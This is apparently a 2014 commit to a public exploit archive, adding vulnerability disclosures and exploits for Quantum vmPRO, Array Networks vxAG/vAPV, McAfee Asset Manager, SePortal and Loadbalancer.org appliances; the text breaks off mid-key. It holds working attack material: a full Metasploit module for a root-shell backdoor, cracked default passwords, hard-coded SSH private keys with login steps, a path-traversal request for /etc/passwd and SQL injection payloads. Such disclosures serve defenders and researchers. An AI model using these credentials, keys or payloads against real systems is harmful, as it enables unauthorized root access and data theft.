Updated 03_21_2014

2014-03-21 04:32:58 +00:00 · 2014-03-21 04:32:58 +00:00 · 595a23d463
commit 595a23d463
parent 7b85826f34
10 changed files with 781 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -13612,7 +13612,7 @@ id,file,description,date,author,platform,type,port
 15699,platforms/php/webapps/15699.txt,"PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80
 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0
 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0
-15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
+15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0
 15706,platforms/windows/local/15706.txt,"Winamp 5.6 Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0
@ -29055,7 +29055,7 @@ id,file,description,date,author,platform,type,port
 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-08-19,"James Bercegay",php,webapps,0
 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script 'id' Parameter SQL Injection Vulnerability",2008-08-20,"Hussin X",php,webapps,0
 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure Vulnerability",2008-06-19,"Charalambous Glafkos",php,webapps,0
-32282,platforms/php/webapps/32282.txt,"Church Edit Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
+32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0
 32283,platforms/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 'pid' Parameter SQL Injection Vulnerability",2008-08-21,"Hussin X",php,webapps,0
 32284,platforms/php/webapps/32284.txt,"Simasy CMS 'id' Parameter SQL Injection Vulnerability",2008-08-21,r45c4l,php,webapps,0
 32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 '$newpm[title]' Parameter Cross-Site Scripting Vulnerability",2008-08-20,"Core Security",php,webapps,0
@ -29130,8 +29130,17 @@ id,file,description,date,author,platform,type,port
 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP 'news.php' SQL Injection Vulnerability",2008-09-10,r45c4l,php,webapps,0
 32356,platforms/windows/dos/32356.txt,"ZoneAlarm Security Suite 7.0 AntiVirus Directory Path Buffer Overflow Vulnerability",2008-09-11,"Juan Pablo Lopez Yacubian",windows,dos,0
 32358,platforms/windows/local/32358.pl,"MP3Info 0.8.5a - SEH Buffer Overflow Exploit",2014-03-19,"Ayman Sagy",windows,local,0
 32359,platforms/php/remote/32359.txt,"SePortal 2.5 - SQL Injection Vulnerabilty",2014-03-19,jsass,php,remote,0
 32360,platforms/php/webapps/32360.txt,"NooMS 1.1 smileys.php page_id Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
 32361,platforms/php/webapps/32361.txt,"NooMS 1.1 search.php q Parameter XSS",2008-09-11,Dr.Crash,php,webapps,0
 32362,platforms/multiple/remote/32362.txt,"Unreal Engine 3 - Failed Memory Allocation Remote Denial of Service Vulnerability",2008-09-12,"Luigi Auriemma",multiple,remote,0
 32363,platforms/multiple/remote/32363.txt,"Epic Games Unreal Engine 436 - Multiple Format String Vulnerabilities",2008-09-11,"Luigi Auriemma",multiple,remote,0
 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 'index.php' Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 Multiple Cross Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0
 32366,platforms/php/webapps/32366.txt,"QuicO 'photo.php' SQL Injection Vulnerability",2008-09-12,"Beenu Arora",php,webapps,0
 32367,platforms/unix/remote/32367.rb,"Quantum vmPRO - Backdoor Command",2014-03-19,metasploit,unix,remote,22
 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80
 32369,platforms/hardware/webapps/32369.txt,"Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 - Multiple Vulnerabilities",2014-03-19,xistence,hardware,webapps,0
 32370,platforms/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Privilege Escalation",2014-03-19,xistence,hardware,local,0
 32371,platforms/unix/remote/32371.txt,"Loadbalancer.org Enterprise VA 7.5.2 - Static SSH Key",2014-03-19,xistence,unix,remote,0
 32372,platforms/unix/remote/32372.txt,"Quantum DXi V1000 2.2.1 - Static SSH Key",2014-03-19,xistence,unix,remote,22
--- a/platforms/hardware/local/32370.txt
+++ b/platforms/hardware/local/32370.txt
@ -0,0 +1,85 @@
 -----------
 Author:
 -----------
 xistence < xistence[at]0x90[.]nl >
 -------------------------
 Affected products:
 -------------------------
 Quantum vmPRO 3.1.2 and below
 -------------------------
 Affected vendors:
 -------------------------
 Quantum
 http://quantum.com/
 -------------------------
 Product description:
 -------------------------
 Unlike traditional backup applications and other backup applications
 designed for virtual environments,
 Quantum vmPRO Software backs up VMs in native VMware format. This enables
 users to restore or boot VMs
 in seconds without the use of a backup application, reduces virtual server
 and network usage by reducing
 VM image sizes before backing up those images to backup storage, and
 substantially reduces the cost of
 using traditional backup applications to back up virtual environments.
 ----------
 Details:
 ----------
 [ 0x01 - Shell Backdoor Command ]
 The file "/usr/local/pancetera/bin/cmd_processor.py" on the vmPRO 3.1.2
 virtual machine contains the following lines:
    def cmd_shell_escape(self, args):
        log_panshell(syslog.LOG_INFO, "internal consistency check started")
        env = dict(os.environ)
        env['SHELL'] = '/bin/bash'
        env['HOME']  = '/tmp'
        env['TERM']  = 'xterm'
        os.spawnle(os.P_WAIT, '/bin/bash', 'bash', env)
        log_panshell(syslog.LOG_INFO, "internal consistency check finished")
        return
 This is a hidden command to gain a root shell. If we create a user in the
 web interface without administrator rights,
 we can still ssh and gain a root shell! This of course should not be
 possible and only be accessible to an admin user.
 $ ssh non-admin@192.168.2.112
 non-admin@192.168.2.112's password:
 Last login: Thu Dec 19 23:42:10 2013 from 192.168.2.72
 Welcome to Quantum vmPRO Console
 --------------------------------
 Quantum vmPRO GUI: https://192.168.2.112/
 *** Type 'help' for a list of commands.
 quantum:localhost> shell-escape
 bash-4.1# id
 uid=0(root) gid=100(users) groups=0(root),100(users)
 -----------
 Solution:
 -----------
 Upgrade to version 2.3.0.1 or newer
 --------------
 Timeline:
 --------------
 03-01-2014 - Issues discovered and vendor notified
 15-01-2014 - No reply, asked for status update.
 17-03-2014 - No replies, public disclosure
--- a/platforms/hardware/webapps/32369.txt
+++ b/platforms/hardware/webapps/32369.txt
@ -0,0 +1,224 @@
 -----------
 Author:
 -----------
 xistence < xistence[at]0x90[.]nl >
 -------------------------
 Affected products:
 -------------------------
 Array Networks vxAG 9.2.0.34 and vAPV 8.3.2.17 appliances
 -------------------------
 Affected vendors:
 -------------------------
 Array Networks
 http://www.arraynetworks.com/
 -------------------------
 Product description:
 -------------------------
 vAPV:
 Virtual Application Delivery Controllers for Cloud and Virtualized
 Environments
 Powered by Array's award-winning 64-bit SpeedCore(tm) architecture, vAPV
 virtual application delivery controllers extend Array's
 proven price-performance and rich feature set to public and private clouds
 and virtualized datacenter environments.
 vAPV virtual application delivery controllers give enterprises and service
 providers the agility to offer on-demand
 load balancing services, dynamically allocate resources to maximize ROI on
 application infrastructure and develop and size
 new application environments using either private or public clouds.
 vxAG:
 Secure Access Gateways for Enterprise, Cloud & Mobile Environments
 Secure access gatewaysSecure access is undergoing dramatic change. With
 increasing mobility, growing adoption of cloud
 services and a shift in thinking that favors securing data over securing
 networks and devices, modern enterprises require
 a new breed of secure access solutions. Secure access gateways centralize
 control over access to business critical resources,
 providing security for data in motion and at rest and enforcing application
 level policies on a per user basis.
 The Array AG Series secure access gateway addresses challenges faced by
 enterprise, service provider and pubic-sector
 organizations in the areas of secure remote and mobile access to
 applications and cloud services. Available in a range of
 scalable, purpose-built appliances or as a virtual appliance for cloud and
 virtualized environments, the AG Series can
 support multiple communities of interest, connect users both in the office
 and on-the-go and provide access to traditional
 enterprise applications as well as services running in public and private
 clouds.
 ----------
 Details:
 ----------
 [ 0x01 - Default Users/Passwords ]
 The /etc/master.passwd file on the vxAG 9.2.0.34 and vAPV 8.3.2.17
 appliances contain default (unkown to the admin) shell users and passwords.
 $ cat /etc/master.passwd
 # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
 #
 root:$1$9QkJT4Y5$lF2BPaSI2kPlcrqz89yZv0:0:0::0:0:Charlie &:/root:/bin/csh
 toor:*:0:0::0:0:Bourne-again Superuser:/root:
 daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
 operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
 bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
 tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
 kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
 games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
 news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
 man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
 sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
 smmsp:*:25:25::0:0:Sendmail Submission
 User:/var/spool/clientmqueue:/usr/sbin/nologin
 mailnull:*:26:26::0:0:Sendmail Default
 User:/var/spool/mqueue:/usr/sbin/nologin
 bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
 proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
 _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
 _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
 uucp:*:66:66::0:0:UUCP
 pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
 pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
 www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
 nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
 test:$1$UtEw8DNY$te4MRasnXgETxWOZ9Z1o10:1002:1002::0:0:test:/export/test:/bin/tcsh
 sync:$1$bmfGRJPh$lWnesbn8M8xZNo3uaqfEd1:1005:0::0:0:sync:/export/sync:/bin/sh
 recovery::65533:0::0:0:Recovery User:/:/ca/bin/recovery
 mfg:$1$i8SV4bKc$lNMeb8Yow.p.cZvWxt1mO1:1013:1010::0:0:mfg:/export/mfg:/bin/tcsh
 arraydb:*:1015:0::0:0:User &:/home/arraydb:/bin/sh
 array::1016:1011::0:0:User &:/:/ca/bin/ca_shell
 Doing a quick password crack, the passwords for the mfg and sync are
 revealed:
 User: mfg Password: mfg
 User: sync Password: click1
 The passwords for "test" and "root" couldn't be cracked in a short time.
 Below an example of logging in with the user "sync" and password "click1"
 via SSH.
 $ ssh sync@192.168.2.55 /bin/sh
 sync@192.168.2.55's password:
 id
 uid=1005(sync) gid=0(wheel) groups=0(wheel)
 [ 0x02 - SSH Private Key ]
 The "sync" user also contains a private key in "~/.ssh/id_dsa":
 $ cat id_dsa
 -----BEGIN DSA PRIVATE KEY-----
 MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
 q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
 xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
 Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
 gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
 mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
 O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
 OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
 +0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
 +sqSEhA35Le2kC4Y1/A=
 -----END DSA PRIVATE KEY-----
 The following authorized keys file are there in the ~/.ssh directory:
 $ cat authorized_keys
 1024 35
 117781646131320088945310945996213112717535690524599971400605193647439008360689916421327587459429042579662784434303538942896683338584760112042194838342054595473085094045804963620754645364924583113650482968246287214031112796524662479539236259838315876244144983122361617319660444993650437402628793785173700484401
 sync@AN
 $ cat authorized_keys2
 ssh-dss
 AAAAB3NzaC1kc3MAAACBAJTDsX+8olPZeyr58g9XE0L8PKT5030NZBPlE7np4hBqx36HoWarWq1Csn8M57dWN9StKbs03k2ggY6sYJK5AW2EWar70um3pYjKQHiZq7mITmitsozFN/K7wu2e2iKRgquUwH5SuYoOJ29n7uhaILXiKZP4/H/dDudqPRSY6tJPAAAAFQDtuWH90mDbU2L/Ms2lfl/cja/wHwAAAIAMBwSHZt2ysOHCFe1WLUvdwVDHUqk3QHTskuuAnMlwMtSvCaUxSatdHahsMZ9VCHjoQUx6j+TcgRLDbMlRLnwUlb6wpniehLBFk+qakGcREqks5NxYzFTJXwROzP72jPvVgQyOZHWq81gCild/ljL7hmrduCqYwxDIz4o7U92UKQAAAIBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQOC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb+0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBg==
 sync@AN
 This makes it possible to use the private key to login without a password.
 Do the following on a different system:
 Insert the id_dsa private key in a file called "synckey":
 cat > ~/synckey << EOF
 -----BEGIN DSA PRIVATE KEY-----
 MIIBugIBAAKBgQCUw7F/vKJT2Xsq+fIPVxNC/Dyk+dN9DWQT5RO56eIQasd+h6Fm
 q1qtQrJ/DOe3VjfUrSm7NN5NoIGOrGCSuQFthFmq+9Lpt6WIykB4mau5iE5orbKM
 xTfyu8LtntoikYKrlMB+UrmKDidvZ+7oWiC14imT+Px/3Q7naj0UmOrSTwIVAO25
 Yf3SYNtTYv8yzaV+X9yNr/AfAoGADAcEh2bdsrDhwhXtVi1L3cFQx1KpN0B07JLr
 gJzJcDLUrwmlMUmrXR2obDGfVQh46EFMeo/k3IESw2zJUS58FJW+sKZ4noSwRZPq
 mpBnERKpLOTcWMxUyV8ETsz+9oz71YEMjmR1qvNYAopXf5Yy+4Zq3bgqmMMQyM+K
 O1PdlCkCgYBmhSl9CVPgVMv1xO8DAHVhM1huIIK8mNFrzMJz+JXzBx81ms1kWSeQ
 OC/nraaXFTBlqiQsvB8tzr4xZdbaI/QzVLKNAF5C8BJ4ScNlTIx1aZJwyMil8Nzb
 +0YAsw5Ja+bEZZvEVlAYnd10qRWrPeEY1txLMmX3wDa+JvJL7fmuBgIUZoXsJnzs
 +sqSEhA35Le2kC4Y1/A=
 -----END DSA PRIVATE KEY-----
 EOF
 Change the rights of the file:
 chmod 600 ~/synckey
 SSH into the vxAG or vAPV appliance (change the IP below):
 ssh -i ~/synckey sync@192.168.2.55 /bin/sh
 Now you won't see a command prompt, but you can enter an "id" for example
 and you'll get:
 uid=1005(sync) gid=0(wheel) groups=0(wheel)
 [ 0x03 - Root Privilege Escalation ]
 The last issue is that the files "/ca/bin/monitor.sh" and
 "/ca/bin/debug_syn_stat" are world writable (chmod 777). Any user can write
 to these files.
 As the sync user it's possible to write to these files. If you write
 arbitrary commands to the monitor.sh script and then turn the debug
 monitoring off and on it will restart the script with root privileges.
 The sync user is able to run the /ca/bin/backend tool to execute CLI
 commands. Below how it's possible to turn the debug monitor off and on:
 Turn debug monitor off:
 /ca/bin/backend -c "debug monitor off"`echo -e "\0374"`
 Turn debug monitor on:
 /ca/bin/backend -c "debug monitor on"`echo -e "\0374"`
 Thus through combining the SSH private key issue and the world writable
 file + unrestricted backend tool it's possible to gain a remote root shell.
 -----------
 Solution:
 -----------
 Upgrade to newer versions
 Workaround: Change passwords and SSH key. Do a chmod 700 on the world
 writable file.
 --------------
 Timeline:
 --------------
 03-02-2014 - Issues discovered and vendor notified
 08-02-2014 - Vendor replies "Thank you very much for bringing this to our
 attention."
 12-02-2014 - Asked vendor for status updates and next steps.
 17-03-2014 - No replies, public disclosure
--- a/platforms/jsp/webapps/32368.txt
+++ b/platforms/jsp/webapps/32368.txt
@ -0,0 +1,45 @@
 Cloud SSO is vuln to unauthed XSS in the authentication audit form:
 https://twitter.com/BrandonPrry/status/445969380656943104
 McAfee Asset Manager v6.6 multiple vulnerabilities
 http://www.mcafee.com/us/products/asset-manager.aspx
 Authenticated arbitrary file read
 An unprivileged authenticated user can download arbitrary files with the permissions of the web server using the report download functionality.
 By generating a report, the user's browser will make a request to /servlet/downloadReport?reportFileName=blah. The user can put in a relative directory traversal attack and download /etc/passwd.
 GET /servlet/downloadReport?reportFileName=../../../../../../../../etc/passwd&format=CSV HTTP/1.1
 Host: 172.31.16.167
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://172.31.16.167/Inventory?filterColumns=&curViewId=-1&maintainQuery=true&format=search&collectorId=null&criticality=0&pageNum=1&location=Inventory&viewSelect=-999999&filterValueField=&orderBy=FIREWALLED&orderBy2=SITE&orderBy3=CRITICALITY_NAME&wsz=200&wszCtrl_1=200&action=AUDIT_REDISCOVER&formatSelect=
 Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
 Connection: keep-alive
 Authenticated SQL injection
 An unprivileged authenticated user can initiate a SQL injection attack by creating an audit report and controlling the username specified in the audit report. In the below request, the 'user' parameter is susceptible to the SQL injection:
 POST /jsp/reports/ReportsAudit.jsp HTTP/1.1
 Host: 172.31.16.167
 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: https://172.31.16.167/jsp/reports/ReportsAudit.jsp
 Cookie: JSESSIONID=F92156C7962D8276FC4BF11CEA8FB554
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 91
 fromDate=03-19-2014&toDate=03-19-2014&freetext=&Severity=0&AuditType=12&user=Administrator
 -- 
 http://volatile-minds.blogspot.com -- blog
 http://www.volatileminds.net -- website
--- a/platforms/multiple/remote/32362.txt
+++ b/platforms/multiple/remote/32362.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/31140/info
 Unreal Engine is prone to a remote denial-of-service vulnerability because of an error in memory allocation.
 An attacker could exploit this issue to crash applications that use the vulnerable engine and deny service to legitimate users.
 This issue affects Unreal Engine 3; other versions may also be affected. 
 http://www.exploit-db.com/sploits/32362.zip
--- a/platforms/multiple/remote/32363.txt
+++ b/platforms/multiple/remote/32363.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/31141/info
 Unreal Engine is prone to multiple remote format-string vulnerabilities.
 Attackers can exploit the issues to execute arbitrary code within the context of a client application that uses the vulnerable engine. 
 http://www.exploit-db.com/sploits/32363.zip
--- a/platforms/php/remote/32359.txt
+++ b/platforms/php/remote/32359.txt
@ -0,0 +1,44 @@
 ####################################################################
 Exploit: SePortal 2.5 Sql Injection Vulnerabilty
 Author: jsass
 Date  : 19\03\2014
 Contact Twitter: @Kwsecurity
 Script: http://www.seportal.org/
 version: 2.5
 Tested on: Linux Ubuntu 12.4 & Windows 7
 Dork : "Powered by SePortal 2.5"
 //** Searching And  Analysis By Kuwaity Crew **\\
 ####################################################################
      SQL INJECTION Vulnerabilty
       code :
 $main_template = 'staticpages';
 define('GET_CACHES', 1);
 define('ROOT_PATH', './');
 define('GET_USER_ONLINE', 1);
 define('GET_STATS_BOX', 1);
 include(ROOT_PATH.'global.php');
 require(ROOT_PATH.'includes/sessions.php');
  $sql = "SELECT *
          FROM ".STATICPAGE_TABLE."
          WHERE sp_id = '".$sp_id."'";
  $result = $site_db->query($sql);
      files:
  staticpages.php?sp_id=(inject here)
  print.php?mode=staticpage&client=printer&sp_id=(inject here)
 example:
 http://localhost/seportal2.5/staticpages.php?sp_id=1%27%20%20and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--%20-
 //////////////////////////////////////////////////////////////////////////////////
 Greats: dzkabyle & Mr.Exit & massacreur & rDNix & hamza & Q8 Spy & ????? ?????? & medo medo & sec4ever.com & is-sec.com
--- a/platforms/unix/remote/32367.rb
+++ b/platforms/unix/remote/32367.rb
@ -0,0 +1,136 @@
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 require 'net/ssh'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Auxiliary::CommandShell
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Quantum vmPRO Backdoor Command",
      'Description'    => %q{
        This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin
        privileges, can get access to the restricted SSH shell. By using the hidden backdoor
        "shell-escape" command it's possible to drop to a real root bash shell.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>'  # Original discovery and Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt']
        ],
      'DefaultOptions'  =>
        {
          'ExitFunction' => "none"
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Quantum vmPRO 3.1.2', {}],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Mar 17 2014",
      'DefaultTarget'  => 0))
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(22),
        OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
        OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
      ], self.class
    )
    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end
  def rhost
    datastore['RHOST']
  end
  def rport
    datastore['RPORT']
  end
  def do_login(user, pass)
    opts = {
      :auth_methods => ['password', 'keyboard-interactive'],
      :msframework  => framework,
      :msfmodule    => self,
      :port         => rport,
      :disable_agent => true,
      :config => true,
      :password => pass,
      :record_auth_info => true,
      :proxies => datastore['Proxies']
    }
    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError, Rex::AddressInUse
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end
    if ssh
      conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true)
      return conn
    end
    return nil
  end
  def exploit
    user = datastore['USER']
    pass = datastore['PASS']
    print_status("#{rhost}:#{rport} - Attempt to login...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
      handler(conn.lsock)
    end
  end
 end
--- a/platforms/unix/remote/32371.txt
+++ b/platforms/unix/remote/32371.txt
@ -0,0 +1,125 @@
 -----------
 Author:
 -----------
 xistence < xistence[at]0x90[.]nl >
 -------------------------
 Affected products:
 -------------------------
 Loadbalancer.org Enterprise VA 7.5.2 and below
 -------------------------
 Affected vendors:
 -------------------------
 Loadbalancer.org
 http://www.loadbalancer.org/
 -------------------------
 Product description:
 -------------------------
 The Loadbalancer.org Virtual Appliance is a revolution in software load
 balancing. The software is simple to install on Windows, Mac & Linux and
 does not have any adverse effects on the host operating system.
 ----------
 Details:
 ----------
 [ 0x01 - SSH Private Key ]
 Loadbalancer.org Enterprise VA 7.5.2 contains a default SSH private key:
 [root@lbmaster .ssh]# cat id_dsa
 -----BEGIN DSA PRIVATE KEY-----
 MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
 Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
 yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
 rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
 t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
 cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
 TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
 MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
 2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
 SzmJVCWFyVuuANR2Bnc=
 -----END DSA PRIVATE KEY-----
 And a authorized_keys2:
 [root@lbmaster .ssh]# cat authorized_keys2
 ssh-dss
 AAAAB3NzaC1kc3MAAACBAKwKBw7D4OA1H/uD4htdh04TBIHdbSjeXUSnWJsce8C0tvoB01Yarjv9TFj+tfeDYVWtUK1DA1JkyqSuoAtDANJzF4I6Isyd0KPrW3dHFTcg6Xlz8d3KEaHokY93NOmB/xWEkhme8b7Q0U2iZie2pgWbTLXV0FA+lhskTtPHW3+VAAAAFQDRyayUlVZKXEweF3bUe03zt9e8VQAAAIAEPK1k3Y6ErAbIl96dnUCnZjuWQ7xXy062pf63QuRWI6LYSscm3f1pEknWUNFr/erQ02pkfi2eP9uHl1TI1ql+UmJX3g3frfssLNZwWXAW0m8PbY3HZSs+f5hevM3ua32pnKDmbQ2WpvKNyycKHi81hSI14xMcdblJolhN5iY8/wAAAIAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkA==
 root@lbslave
 The manual says the following:
 ---
 Appliance Security Lockdown Script
 To ensure that the appliance is secure it's recommended that a number of
 steps should be carried out.
 These steps have been incorporated into a lockdown script which can be run
 at the console (recommended) or via a terminal session.
 The script helps to lock down the following:
 - the password for the 'loadbalancer' Web User Interface account
 - the password for the Linux 'root' account
 - which subnet / host is permitted access to the load balancer
 It also regenerates the SSH keys that are used to secure communicating
 between the master and slave appliance.
 To start the script, at the console or via an SSH terminal session run the
 following command:
 ???lbsecure
 ---
 However, the lbsecure script will regenerate the id_dsa/id_dsa.pub, but the
 authorized_keys2 will remain untouched.
 This makes it still possible to login using the key, without any password!
 Create a file "lb" containing the key:
 $ cat lb
 -----BEGIN DSA PRIVATE KEY-----
 MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
 Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
 yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
 rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
